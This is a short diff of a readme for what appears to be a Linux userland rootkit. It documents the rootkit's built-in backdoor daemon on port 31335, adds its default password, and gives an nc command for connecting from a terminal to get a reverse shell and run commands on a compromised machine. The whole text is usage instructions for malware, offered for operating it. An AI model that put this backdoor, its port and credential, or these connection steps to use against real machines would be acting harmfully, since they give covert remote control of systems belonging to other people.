bluedragonsecurity/bds_userland/readme.txt

 ==Using the Rootkit Daemon

-Rootkit built in daemon is listening on port 31335.
+Rootkit built in daemon is listening on port 31335, default password is bluedragonsec.
 Using the rootkit built in daemon, you can issue a reverse shell connection and executing linux command on target machine (which you have installed rootkit) remotely.
 To connect to rootkit daemon, open your terminal and type :
 _________________________

 nc "target ip" 31335